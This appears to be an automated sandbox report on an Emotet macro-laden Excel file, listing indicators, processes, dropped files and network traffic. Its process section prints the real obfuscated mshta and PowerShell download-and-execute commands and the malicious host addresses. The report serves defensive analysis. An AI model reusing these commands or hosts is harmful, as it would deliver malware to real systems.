analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/4b7c0753-5eb2-4ddf-828e-aed236779757
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 18:31:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
loader
trojan
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2804)
      • mshta.exe (PID: 3356)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 3428)
      • rundll32.exe (PID: 2660)
      • SearchProtocolHost.exe (PID: 3672)
      • rundll32.exe (PID: 2616)
      • rundll32.exe (PID: 2324)
      • rundll32.exe (PID: 4048)
      • rundll32.exe (PID: 1844)
      • rundll32.exe (PID: 3328)
      • rundll32.exe (PID: 3808)
    • Connects to CnC server

      • rundll32.exe (PID: 2324)
  • SUSPICIOUS

    • Checks supported languages

      • mshta.exe (PID: 2804)
      • cmd.exe (PID: 2796)
      • powershell.exe (PID: 3516)
      • cmd.exe (PID: 2400)
      • mshta.exe (PID: 3356)
      • powershell.exe (PID: 2972)
      • cmd.exe (PID: 2540)
      • cmd.exe (PID: 1272)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2804)
      • mshta.exe (PID: 3356)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2796)
      • cmd.exe (PID: 2400)
    • Reads default file associations for system extensions

      • SearchProtocolHost.exe (PID: 3672)
      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
    • Reads the computer name

      • mshta.exe (PID: 2804)
      • powershell.exe (PID: 3516)
      • mshta.exe (PID: 3356)
      • powershell.exe (PID: 2972)
    • Reads Environment values

      • powershell.exe (PID: 3516)
      • powershell.exe (PID: 2972)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2972)
      • rundll32.exe (PID: 2660)
      • powershell.exe (PID: 3516)
      • rundll32.exe (PID: 3328)
    • Drops a file with a compile date too recent

      • powershell.exe (PID: 2972)
      • rundll32.exe (PID: 2660)
      • powershell.exe (PID: 3516)
      • rundll32.exe (PID: 3328)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 2540)
      • rundll32.exe (PID: 3428)
      • rundll32.exe (PID: 2616)
      • rundll32.exe (PID: 2660)
      • cmd.exe (PID: 1272)
      • rundll32.exe (PID: 1844)
      • rundll32.exe (PID: 4048)
      • rundll32.exe (PID: 3328)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2972)
      • powershell.exe (PID: 3516)
    • Starts itself from another location

      • rundll32.exe (PID: 3428)
      • rundll32.exe (PID: 1844)
    • Application launched itself

      • rundll32.exe (PID: 2660)
      • rundll32.exe (PID: 2616)
      • rundll32.exe (PID: 3328)
      • rundll32.exe (PID: 4048)
  • INFO

    • Checks supported languages

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
      • rundll32.exe (PID: 3428)
      • rundll32.exe (PID: 2660)
      • rundll32.exe (PID: 2616)
      • rundll32.exe (PID: 2324)
      • rundll32.exe (PID: 1844)
      • rundll32.exe (PID: 3328)
      • rundll32.exe (PID: 3808)
      • rundll32.exe (PID: 4048)
      • control.exe (PID: 3212)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
    • Reads the computer name

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
      • rundll32.exe (PID: 2660)
      • rundll32.exe (PID: 2324)
      • rundll32.exe (PID: 3328)
      • rundll32.exe (PID: 3808)
      • control.exe (PID: 3212)
    • Reads internet explorer settings

      • mshta.exe (PID: 2804)
      • mshta.exe (PID: 3356)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 3516)
      • powershell.exe (PID: 2972)
      • rundll32.exe (PID: 2324)
      • rundll32.exe (PID: 3808)
    • Manual execution by user

      • EXCEL.EXE (PID: 2676)
      • control.exe (PID: 3212)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3720)
      • EXCEL.EXE (PID: 2676)
    • Reads settings of System Certificates

      • rundll32.exe (PID: 2324)
      • rundll32.exe (PID: 3808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:20 19:07:37
CreateDate: 2022:01:20 19:00:43
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
67
Monitored processes
20
Malicious processes
12
Suspicious processes
2

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe powershell.exe excel.exe no specs cmd.exe no specs mshta.exe powershell.exe searchprotocolhost.exe no specs cmd.exe no specs rundll32.exe no specs rundll32.exe rundll32.exe no specs rundll32.exe cmd.exe no specs rundll32.exe no specs rundll32.exe rundll32.exe no specs rundll32.exe control.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3720"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2796cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2804mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\iertutil.dll
3516"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
2676"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2400cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cmd.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3356mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\sechost.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2972"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3672"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
Modules
Images
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2540"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
16 657
Read events
16 295
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
17
Text files
1
Unknown types
8

Dropped files

PID
Process
Filename
Type
3720EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC55B.tmp.cvr
MD5:
SHA256:
2676EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE363.tmp.cvr
MD5:
SHA256:
2676EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70 - Copy.xls.LNKlnk
MD5:B4DD8C3BF70190D4E55E3975AC00F1F6
SHA256:218DC45D76A4740774490C4FCA6450B06B3E1DC5EFA05EA1DAAD2E030339F868
3720EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
3356mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
2972powershell.exeC:\Users\Public\Documents\ssd.dllexecutable
MD5:5FC018538B34E891E67D7CCD6A6F5169
SHA256:8187FDAB6CF2AE48ADACE0A38973B64D2164AEDDD5EE27ECA0C55F5F8683BFAF
2804mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
3328rundll32.exeC:\Users\admin\AppData\Local\Kiszacipymaaoeo\looxxwkrppp.nprexecutable
MD5:5FC018538B34E891E67D7CCD6A6F5169
SHA256:8187FDAB6CF2AE48ADACE0A38973B64D2164AEDDD5EE27ECA0C55F5F8683BFAF
3720EXCEL.EXEC:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xlsdocument
MD5:E787FEADF6558A451B91F1361673B8E2
SHA256:67E584BB691165A4CEBD6470326AE5E3EB9CF8D89E2DD1808B6028F7E5CF42BF
3516powershell.exeC:\Users\Public\Documents\ssd.dllexecutable
MD5:5FC018538B34E891E67D7CCD6A6F5169
SHA256:8187FDAB6CF2AE48ADACE0A38973B64D2164AEDDD5EE27ECA0C55F5F8683BFAF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
315
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3356
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
2804
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
2972
powershell.exe
GET
200
104.21.82.47:80
http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/
US
executable
612 Kb
suspicious
3516
powershell.exe
GET
200
104.21.82.47:80
http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/
US
executable
612 Kb
suspicious
2972
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
3516
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
2324
rundll32.exe
GET
200
8.253.95.249:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?397c2d4e5ade04da
US
compressed
59.9 Kb
whitelisted
2324
rundll32.exe
GET
200
8.253.95.249:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b0a239c4103ae1b1
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2324
rundll32.exe
51.38.71.0:443
GB
malicious
3356
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2972
powershell.exe
104.21.82.47:80
hindimedia.in
Cloudflare Inc
US
suspicious
3808
rundll32.exe
131.100.24.231:80
GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME
BR
malicious
2804
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2324
rundll32.exe
131.100.24.231:80
GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME
BR
malicious
2972
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2324
rundll32.exe
8.253.95.249:80
ctldl.windowsupdate.com
Global Crossing
US
suspicious
2324
rundll32.exe
212.237.17.99:8080
Aruba S.p.A.
IT
malicious
3516
powershell.exe
104.21.82.47:80
hindimedia.in
Cloudflare Inc
US
suspicious

DNS requests

Domain
IP
Reputation
hindimedia.in
  • 104.21.82.47
  • 172.67.153.105
suspicious
ctldl.windowsupdate.com
  • 8.253.95.249
  • 8.241.11.254
  • 8.248.117.254
  • 8.253.95.121
  • 8.248.147.254
  • 93.184.221.240
whitelisted

Threats

PID
Process
Class
Message
2972
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2972
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2972
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3516
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3516
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3516
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2324
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 5
2324
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 14
2324
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 3
2324
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 19
71 ETPRO signatures available at the full report
No debug info